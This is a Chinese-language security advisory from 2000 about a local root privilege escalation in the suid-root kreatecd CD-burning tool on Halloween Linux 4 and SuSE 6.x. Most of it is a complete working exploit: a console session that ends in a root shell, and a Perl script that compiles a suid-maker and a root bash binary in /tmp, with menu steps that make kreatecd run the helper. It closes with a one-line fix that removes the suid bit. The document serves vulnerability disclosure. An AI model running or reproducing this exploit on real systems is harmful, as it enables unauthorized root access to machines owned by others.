发布日期：2000-03-18
更新日期：2000-03-18

受影响系统：

kreatecd
- Halloween Linux Version 4
  SuSE 6.x

描述：

---

    被设置了suid root位的Kreatecd程序盲目相信普通用户提供的录制CD软件的路径。并且
    会以EUID=0的身份执行相应的程序。导致本地用户可能获得root权限。
    由于指定路径要通过点击kcreatecd菜单来完成，远程攻击者可以通过将远程主机的
    Kcreatecd 显示到本地X server上来完成攻击。


<* 来源： [1] S. Krahmer, C-Skills
              http://www.cs.uni-potsdam.de/homepages/students/linuxer/
          [2] TESO
          http://teso.scene.at or https://teso.scene.at/    
*>          


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

    [stealth@liane stealth]$ stat `which kreatecd`
      File: "/usr/bin/kreatecd"
      Size: 229068       Filetype: Regular File
      Mode: (4755/-rwsr-xr-x)         Uid: (    0/    root)  Gid: (    0/    root)
    Device:  3,1   Inode: 360053    Links: 1
    Access: Tue Mar 14 14:48:21 2000(00000.00:00:45)
    Modify: Tue Mar 14 14:48:21 2000(00000.00:00:45)
    Change: Tue Mar 14 14:48:21 2000(00000.00:00:45)
    [stealth@liane stealth]$ id
    uid=500(stealth) gid=500(stealth) groups=500(stealth)
    [stealth@liane stealth]$ /tmp/kreatur
    (... some diagnostic messages ...)
    Creating suid-maker...
    Creating boom-shell...

    Execute kreatecd and follow the menus:
    Configure -> Paths  -- change the path for cdrecord to /tmp/xxx
    Apply -> OK
    Configure -> SCSI -> OK

    Execute /tmp/boomsh

    
    BEHAVE!
       
    (poking around with GUI...)
    [stealth@liane stealth]$ /tmp/boomsh
    [root@liane stealth]# id
    uid=0(root) gid=500(stealth) groups=500(stealth)
    [root@liane stealth]#

测试程序：kreatur

#!/usr/bin/perl

# kreatecd local root-exploit helper script.
# Tested on Halloween 4 distro. Will also work on SuSE 6.x
# (C) 2000 C-skills development, S. Krahmer under the GPL
# http://www.cs.uni-potsdam.de/homepages/students/linuxer

#
# visit TESO at http://teso.scene.at/ or https://teso.scene.at/
#

# ! USE IT AT YOUR OWN RISK !
# For educational purposes only.

if (((stat "/opt/kde/bin/kreatecd")[2] & 04000) != 04000 &&
    ((stat "/usr/bin/kreatecd")[2] & 04000) != 04000)  {
    print "kreatecd not installed suid! handshake with root!\n";
    exit 1;
}

print "kreatecd installed suid!\n";
print "Contact your local script-kiddie.\n";
print "Nobody ever got fired for NOT using GUI-suid-rootprograms! remove it!\n";
print "Creating suid-maker...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
    setreuid(0,0);
    chown("/tmp/boomsh", 0, 0);
    chmod("/tmp/boomsh", 04755);
    exit(1);
}
_EOF_
close O;
system("cc /tmp/boom.c -o /tmp/xxx");

print "Creating boom-shell...\n";
open O, ">/tmp/boomsh.c" or die "open(boomsh.c..)";
print O<<_EOF2_;

int main()
{
    char *a[] = {
        "/bin/bash",
        0
    };
    setuid(0);
    execve(*a, a, 0);
    return 0;
}
_EOF2_
close O;
system("cc /tmp/boomsh.c -o /tmp/boomsh");
print <<_EOF3_;
\nExecute kreatecd and follow the menus:
Configure -> Paths  -- change the path for cdrecord to /tmp/xxx
Apply -> OK
Configure -> SCSI -> OK
\nExecute /tmp/boomsh\n
\nBEHAVE!\n
_EOF3_



建议：

---

chmod a-s `which kreatecd.`

浏览次数：6696
严重程度：0（网友投票）